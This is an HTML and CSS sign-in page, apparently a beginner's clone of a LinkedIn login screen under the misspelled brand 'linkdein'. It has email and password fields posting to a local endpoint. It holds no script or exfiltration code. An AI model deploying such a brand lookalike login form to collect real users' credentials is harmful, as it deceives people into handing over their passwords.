<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
          .header3{ 
    width: 120px;margin-left: 50px;
        }
        .h1{
            background-color: rgb(45, 45, 237);
            color: white;
        }
        .in6{
    border-radius: 30px;
    padding-top: 10px;
    padding-bottom: 10px;
    width: 300px;
    padding-left: 30px;
}
.div1{
    margin-left: 450px;
    width: 360px;
    padding-left: 50px;
    height: 520px;
    display: flex;
    flex-direction: column;
    background-color: white;
    border-radius: 10px;
    box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1); 
}
.div3{
    display: flex;
    flex-direction: column;gap: 15px;
    margin-bottom: 5px;
    
}
.div5{
    display: flex;
    flex-direction: column;
    gap: 18px;
}
.in5{
    width: 300px;
    padding-top: 13px;
    padding-bottom: 13px;
    border-radius: 5px;
    padding-left: 10px;
    
}
.p{
    color: rgb(12, 12, 233);
}
.div6{
    display: flex;
    flex-direction: row;
    gap: 0;
    
}
.in0{
    width: 300px;
    padding-top: 13px;
    padding-bottom: 13px;
    background-color: rgb(38, 38, 225);
   border-radius: 30px;
}
.p1{
    margin-left:520px ;
    margin-top: 15px;
}
    </style>
</head>
<body>
    <header class="header3">
        <h1 class="h1">linkdein</h1>
            </header>
            <div class="div1">
                <div class="div2"><h1>sign in</h1></div>
<div class="div3">
    <button class="in6" type="submit"> <img src="https://upload.wikimedia.org/wikipedia/commons/5/53/Google_%22G%22_Logo.svg" alt="Google G" width="20">Continue with google account</button>
    <button class="in6" type="submit"> <img src="https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg" alt="Microsoft Logo" width="20">Continue with microsoft
    </button>
</div>
<div>
    <hr>
    <p>or</p>
</div>
<div class="div5">
    <form action="/submit" method="post" class="div5">
<input type="email" placeholder="email or phone" class="in5" name="input">
<input type="password" placeholder="password" class="in5" name="output">

</div>
<p class="p"> <a href="">forgot password?</a></p>
<div class="div6">
<input type="checkbox">
<h3>keep me loged in</h3>
</div>
<div>

        <button class="in0">sign in</button>
   </form>
</div>
</div>
<p class="p1">new to linkden?<a href="/join">join now</a></p>
</body>
</html>